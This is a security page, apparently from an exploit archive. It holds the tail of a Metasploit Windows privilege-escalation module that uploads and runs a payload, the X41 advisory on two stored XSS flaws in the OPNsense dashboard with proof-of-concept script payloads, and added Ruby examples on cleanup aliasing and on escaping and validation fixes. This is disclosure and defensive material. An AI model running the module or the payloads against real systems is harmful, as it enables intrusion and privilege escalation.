return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2<br /><br /> return Exploit::CheckCode::Safe<br /> end<br /><br /> def exploit<br /> fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?<br /> fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?<br /> shadow_dir = datastore['SHADOW_DRIVE']<br /> # Validate the option before anything is written to disk, so a bad value does not leave files behind.<br /> if shadow_dir.length > 64<br /> fail_with(Module::Failure::BadConfig, 'SHADOW_DRIVE value too long')<br /> end<br /> home_dir = get_env('HOMEDRIVE')<br /> shadow_path = "#{home_dir}\\#{shadow_dir}"<br /> vprint_status("Shadow Path = #{shadow_path}")<br /> upload_error_report<br /> shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)<br /> upload_shadow_report(shadow_archive_dir)<br /> shadow_system32 = build_shadow_system32(shadow_path.dup)<br /> upload_payload(shadow_system32)<br /> sleep datastore['EXECUTE_DELAY']<br /> exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"<br /> exploit_path << '.exe' unless exploit_path[-4..] == '.exe'<br /> upload_execute_exploit(exploit_path, shadow_dir, home_dir)<br /> print_warning("Manual deletion of #{shadow_path} may be required")<br /> end<br />end<br /></code></pre>
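The `clone_mkdir` comment in the module above describes a Ruby aliasing hazard that is easy to miss: `build_shadow_archive_dir` grows one String with `<<` and registers it at every level, and a cleanup list that keeps the reference it was handed would end up holding the final path six times over. The Ruby below is an added example, not part of the Metasploit module; `CleanupRegistry` is a stand-in for FileDropper's registration list, written here to make the aliasing visible, and the path segments are the ones the module creates.

```ruby
# Added example, not part of the module above: why clone_mkdir exists.
# A cleanup list that stores the String object it is handed will see every
# later `<<` on that object, so each registered entry silently becomes the
# final, deepest path unless a copy is registered instead.

class CleanupRegistry
  attr_reader :dirs

  def initialize
    @dirs = []
  end

  # Stores the reference it is given, as a real cleanup list would.
  def register(dir)
    @dirs << dir
    self
  end

  # Deepest first, so children are removed before their parents.
  def removal_order
    @dirs.uniq.sort_by { |d| -d.length }
  end
end

# The directory chain the module builds under the shadow drive.
SHADOW_SEGMENTS = %w[ProgramData Microsoft Windows WER ReportArchive].freeze

# Builds base\ProgramData\Microsoft\Windows\WER\ReportArchive by repeated
# `<<`, registering each level as it goes. With clone: false the registry
# ends up holding six references to one mutated String; with clone: true it
# holds six distinct paths, one per directory actually created.
def build_shadow_chain(base, registry, clone:)
  path = base.dup
  registry.register(clone ? path.clone : path)
  SHADOW_SEGMENTS.each do |segment|
    path << '\\' << segment
    registry.register(clone ? path.clone : path)
  end
  path
end

if __FILE__ == $PROGRAM_NAME
  aliased = CleanupRegistry.new
  build_shadow_chain('C:\\shadow', aliased, clone: false)
  puts "aliased: #{aliased.dirs.uniq.size} distinct path(s) registered"
  cloned = CleanupRegistry.new
  build_shadow_chain('C:\\shadow', cloned, clone: true)
  puts "cloned:  #{cloned.dirs.uniq.size} distinct path(s) registered"
  puts cloned.removal_order
end
```

The `removal_order` method is the other half of the story: cleanup has to delete the deepest directory first, which is only possible when each level was registered as its own String.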
<pre><code><br />Advisory X41-2023-001: Two Vulnerabilities in OPNsense<br />===========================================================<br />Highest Severity Rating: High<br />Confirmed Affected Versions: 23.1.11_1, 23.7.3, 23.7.4<br />Confirmed Patched Versions: Commit 484753b2abe3fd0fcdb73d8bf00c3fc3709eb8b7<br />Vendor: Deciso B.V. / OPNsense<br />Vendor URL: https://opnsense.org<br />Credit: X41 D-Sec GmbH, Yasar Klawohn and JM<br />Status: Public <br />Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2023-001-opnsense<br /><br /><br />Summary and Impact<br />------------------<br />The OPNsense dashboard displays widgets with information about the system,<br />running services, gateways and more. These widgets can be arranged in<br />different orders and columns. The values for the number of columns and the<br />order of widgets are stored server-side and are the same for all users of an<br />OPNsense instance. They are reflected unmodified on every visit. This can be<br />abused by a low-privileged attacker to inject their own content into the<br />page, enabling a cross-site scripting (XSS) attack that can result in<br />privilege escalation.<br /><br /><br />Product Description<br />-------------------<br />OPNsense is an open source, FreeBSD-based firewall and routing operating<br />system. It includes many features of commercial firewalls and can be managed<br />entirely via its web GUI.<br /><br /><br />Stored XSS in the OPNsense Dashboard via the column_count Parameter<br />===================================================================<br />Severity Rating: High<br />Vector: Network<br />CWE: 79<br />CVSS Score: 8.0<br />CVSS Vector: 3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />Credit: X41 D-Sec GmbH, Yasar Klawohn<br /><br /><br />Analysis<br />--------<br />The number of columns displayed in the dashboard is set via an HTTP POST<br />request to /index.php, using the column_count request parameter. 
This<br />parameter is not properly escaped when returned to the client. To exploit<br />this issue, the payload "><script>alert(1)</script> is submitted as part of<br />the column_count parameter. This input is reflected unmodified in the<br />response and on any subsequent visit to the dashboard by any user. Only the<br />"Lobby: Login / Logout / Dashboard" permission is required to abuse this<br />issue.<br /><br />Once the server receives the POST request, the column_count parameter is<br />written unmodified into the configuration:<br /><br />} elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['origin'])<br /> && $_POST['origin'] == 'dashboard') {<br /> // ...<br /> if (!empty($_POST['column_count'])) {<br /> $config['widgets']['column_count'] = $_POST['column_count'];<br /> } elseif(isset($config['widgets']['column_count'])) {<br /> unset($config['widgets']['column_count']);<br /> }<br /> write_config('Widget configuration has been changed');<br /> header(url_safe('Location: /index.php'));<br /> exit;<br />}<br />// from:<br />// https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L66-L79<br /><br />When the dashboard is rendered, the stored column_count is read back and,<br />if it is not empty, used unmodified:<br /><br />// ...<br />if ($_SERVER['REQUEST_METHOD'] === 'GET') {<br /> $pconfig = $config['widgets'];<br /> // ...<br /> $pconfig['column_count'] =<br /> !empty($pconfig['column_count']) ? $pconfig['column_count'] : 2;<br /> // ...<br />// from:<br />// https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L42<br /><br />Below, the unmodified value is written:<br /><br /><!-- ... 
--><br /><section class="page-content-main"><br /> <form method="post" id="iform"><br /> <input type="hidden" value="dashboard" name="origin" id="origin" /><br /> <input type="hidden" value="" name="sequence" id="sequence" /><br /> <input type="hidden" value="<?= $pconfig['column_count'];?>"<br /> name="column_count" id="column_count_input" /><br /> </form><br /><!-- ... --><br /><!-- from:<br />https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L332<br />--><br /><br />Proof of Concept<br />----------------<br />Log in as root. On the left side, go to System -> Access -> Users, and add a<br />new user. For "Effective Privileges", only select "Lobby: Login / Logout /<br />Dashboard". The user is now only able to view the dashboard and the help<br />pages.<br /><br />Log in as that newly created user and open your browser's network monitor.<br />In the OPNsense dashboard, select "1 column" from the top right and then<br />press "save settings". Repeat the POST request and replace the column_count<br />variable with<br /><br />column_count=1"><script>alert(1)</script><br /><br />Now log in as admin again; you should see an alert box resulting from the<br />following HTML response:<br /><br /><form method="post" id="iform"><br /> <!-- .. --><br /> <input type="hidden" value="1"><br /> <script>alert(1)</script>"<br /> name="column_count" id="column_count_input" /><br /></form><br /><br />This is the stored XSS and can result in privilege escalation. 
The OPNsense<br />developers did apply a Content-Security-Policy, but unfortunately allow<br />unsafe-inline and unsafe-eval for scripts, which does not prevent the<br />exploitation of this vulnerability.<br /><br /><br />Stored XSS in the OPNsense Dashboard via the sequence Parameter<br />===============================================================<br />Severity Rating: High<br />Vector: Network<br />CWE: 79<br />CVSS Score: 8.0<br />CVSS Vector: 3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />Credit: X41 D-Sec GmbH, JM and Yasar Klawohn<br /><br /><br />Analysis<br />--------<br />The order in which the widgets are displayed in the Dashboard is set via an<br />HTTP POST request to /index.php, using the sequence request parameter. This<br />parameter is not properly escaped when returned to the client. To exploit<br />this issue, the payload "><script>alert(1)</script> is submitted as part of<br />the sequence parameter. This input is reflected unmodified in the response<br />and on any subsequent visit to the dashboard by any user. Only the "Lobby:<br />Login / Logout / Dashboard" permission is required to abuse this issue.<br /><br />
The sequence parameter has the<br />following format:<br /><br />sequence=services_status-container:00000000-col3:show,<br /> interface_list-container:00000001-col4:show,<br /> gateways-container:00000002-col4:show<br /><br />Once the server receives the POST request, the sequence parameter is written<br />unmodified into the configuration:<br /><br />} elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['origin'])<br /> && $_POST['origin'] == 'dashboard') {<br /> if (!empty($_POST['sequence'])) {<br /> $config['widgets']['sequence'] = $_POST['sequence'];<br /> } elseif (isset($config['widgets']['sequence'])) {<br /> unset($config['widgets']['sequence']);<br /> }<br /> // ...<br /> write_config('Widget configuration has been changed');<br /> header(url_safe('Location: /index.php'));<br /> exit;<br />}<br />// from:<br />// https://github.com/opnsense/core/blob/cbaf7cee1f0a6fabd1ec4c752a5d169c402976dc/src/www/index.php#L66-L80<br /><br />When serving a GET request, the sequence parameter is returned unmodified,<br />starting with a read of its value from the configuration:<br /><br />// ...<br />$pconfig = $config['widgets'];<br />// set default dashboard view<br />$pconfig['sequence'] = !empty($pconfig['sequence']) ?<br /> $pconfig['sequence'] : '';<br />// ...<br />// from:<br />// https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L39-L41<br /><br />sequence is then split by comma and further split by colon into name,<br />sortKey, and state. 
The list of widgets is sorted on the server side using<br />the sortKey.<br /><br />$widgetSeqParts = explode(",", $pconfig['sequence']);<br />foreach (glob('/usr/local/www/widgets/widgets/*.widget.php') as $php_file) {<br /> $widgetItem = array();<br /> // [...]<br /> foreach ($widgetSeqParts as $seqPart) {<br /> $tmp = explode(':', $seqPart);<br /> if (count($tmp) == 3 &&<br /> explode('-', $tmp[0])[0] == $widgetItem['name']<br /> ) {<br /> $widgetItem['state'] = $tmp[2];<br /> $widgetItem['sortKey'] = $tmp[1];<br /> }<br /> }<br /> $widgetCollection[] = $widgetItem;<br />}<br />// sort widgets<br />usort($widgetCollection, function ($item1, $item2) {<br /> return strcmp(strtolower($item1['sortKey']),<br /> strtolower($item2['sortKey']));<br />});<br />// from:<br />// https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L44-L65<br /><br />Finally, the sortKey is written unescaped into an HTML attribute:<br /><br /><section<br /> class="widgetdiv"<br /> data-sortkey="<?=$widgetItem['sortKey'] ?>"<br /> id="<?=$widgetItem['name'];?>"<br /> style="display:<?=$divdisplay;?>;"<br /><!-- from:<br />https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L374<br />--><br /><br /><br />Proof of Concept<br />----------------<br />Log in as root. On the left side, go to System -> Access -> Users, and add a<br />new user. For "Effective Privileges", only select "Lobby: Login / Logout /<br />Dashboard". The user is now only able to view the dashboard and the help<br />pages.<br /><br />Log in as that newly created user and open your browser's network monitor. 
In<br />the OPNsense dashboard, reorder the widgets via drag-and-drop, then press<br />"save settings".<br /><br />Repeat the POST request and replace the sequence variable with<br /><br />sequence=gateways-container:1"><script>alert(1)</script>-col4:show<br /><br />Now log in as admin again; you should see an alert box resulting from the<br />following HTML response:<br /><br /><div class="container-fluid"><br /> <!-- ... --><br /> <section class="widgetdiv" data-sortkey="1"><br /> <script>alert(1)</script><br /> -col4" id="gateways" style="display:block;"><br /><br />This is the stored XSS and can result in privilege escalation.<br /><br />The OPNsense developers did apply a Content-Security-Policy, but<br />unfortunately allow unsafe-inline and unsafe-eval for scripts, which does not<br />prevent the exploitation of this vulnerability.<br /><br /><br />Workarounds<br />===========<br /><br />Remove the effective privilege for /index.php* from low-privilege users.<br /><br />Timeline<br />========<br />2023-09-13: Problem discovered<br /><br />2023-09-14: Write-up and discovery of second finding<br /><br />2023-09-19: Disclosure to Deciso B.V. / OPNsense<br /><br />2023-09-19: Issue fixed upstream by Deciso B.V. / OPNsense<br /><br />2023-09-20: CVE requested<br /><br />2023-09-20: Informed Deciso B.V. 
/ OPNsense that we will make the issues<br />public the following day, since the patch is public<br /><br />2023-09-21: Release of advisory<br /><br /><br />About X41 D-Sec GmbH<br />====================<br />X41 is an expert provider for application security services.<br />Having extensive industry experience and expertise in the area of information<br />security, a strong core security team of world class security experts enables<br />X41 to perform premium security services.<br /><br />Fields of expertise in the area of application security are security centered<br />code reviews, binary reverse engineering and vulnerability discovery.<br />Custom research and IT security consulting and support services are core<br />competencies of X41.<br /></code></pre>
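Both findings in the advisory above come down to the same pattern: a value accepted from a POST, stored server-side, and later interpolated into an HTML attribute without escaping. The Ruby below is an added example, not OPNsense code (index.php is PHP); it re-creates the `explode(',')` / `explode(':')` / `explode('-')` parsing the advisory quotes, renders the vulnerable `data-sortkey` attribute so the PoC payload can be seen landing in it, and then shows the hardened form: validate the stored values against the documented `name-container:sortKey-colN:state` shape and escape on output regardless. The column range (1 to 4) and the `show|close` state vocabulary are assumptions made for this example; the advisory only documents `col3`, `col4` and `show`. The payloads are the ones from the two proofs of concept and the benign sequence is constructed in the documented format.

```ruby
# Added example, not OPNsense code: a Ruby re-creation of the dashboard
# parsing in src/www/index.php described in the advisory, beside a hardened
# version that validates the stored values and escapes them on output.
require 'cgi'

# Payloads from the advisory's proofs of concept, plus a benign sequence in
# the documented format (constructed sample input).
XSS_COLUMN_COUNT = '1"><script>alert(1)</script>'
XSS_SEQUENCE     = 'gateways-container:1"><script>alert(1)</script>-col4:show'
BENIGN_SEQUENCE  = 'services_status-container:00000000-col3:show,' \
                   'interface_list-container:00000001-col4:show,' \
                   'gateways-container:00000002-col4:show'

# Mirrors explode(',') / explode(':') / explode('-') in index.php: keep the
# parts with exactly three colon-separated fields. (index.php also matches
# the name against the installed widget files; that lookup is omitted here.)
def parse_sequence(sequence)
  sequence.to_s.split(',').filter_map do |part|
    fields = part.split(':', -1)
    next unless fields.size == 3
    name, sort_key, state = fields
    { name: name.split('-', 2).first.to_s, sort_key: sort_key, state: state }
  end
end

# The vulnerable output: sortKey lands in an attribute unescaped, so a value
# containing `">` closes the attribute and the tag and injects markup.
def render_widget_vulnerable(widget)
  %(<section class="widgetdiv" data-sortkey="#{widget[:sort_key]}" id="#{widget[:name]}">)
end

# Hardened: accept only the documented shapes. The column range (1..4) and the
# state vocabulary are assumptions for this example, not taken from the advisory.
SORT_KEY_RE = /\A\d{1,10}-col[1-4]\z/
NAME_RE     = /\A[a-z0-9_]+\z/
STATE_RE    = /\A(show|close)\z/

def valid_widget?(widget)
  NAME_RE.match?(widget[:name]) &&
    SORT_KEY_RE.match?(widget[:sort_key]) &&
    STATE_RE.match?(widget[:state])
end

# Drops malformed entries, then orders the rest like index.php's usort/strcmp.
def sanitize_sequence(sequence)
  parse_sequence(sequence).select { |w| valid_widget?(w) }
                          .sort_by { |w| w[:sort_key].downcase }
end

# Escape on output regardless of validation: the two controls are independent,
# and the CSP noted in the advisory (unsafe-inline) would not catch a miss.
def render_widget(widget)
  %(<section class="widgetdiv" data-sortkey="#{CGI.escapeHTML(widget[:sort_key])}" id="#{CGI.escapeHTML(widget[:name])}">)
end

# column_count: a small integer, otherwise the default of 2 that index.php uses.
def column_count_or_default(raw, default: 2)
  n = Integer(raw.to_s, 10, exception: false)
  n && (1..4).cover?(n) ? n : default
end

if __FILE__ == $PROGRAM_NAME
  widget = parse_sequence(XSS_SEQUENCE).first
  puts render_widget_vulnerable(widget)
  puts render_widget(widget)
  p sanitize_sequence(XSS_SEQUENCE)
  p column_count_or_default(XSS_COLUMN_COUNT)
end
```

Run stand-alone, the first line printed reproduces the broken `<section ...>` from the advisory's PoC response, the second shows the same value rendered as an inert attribute, and the sanitised sequence for the payload is empty.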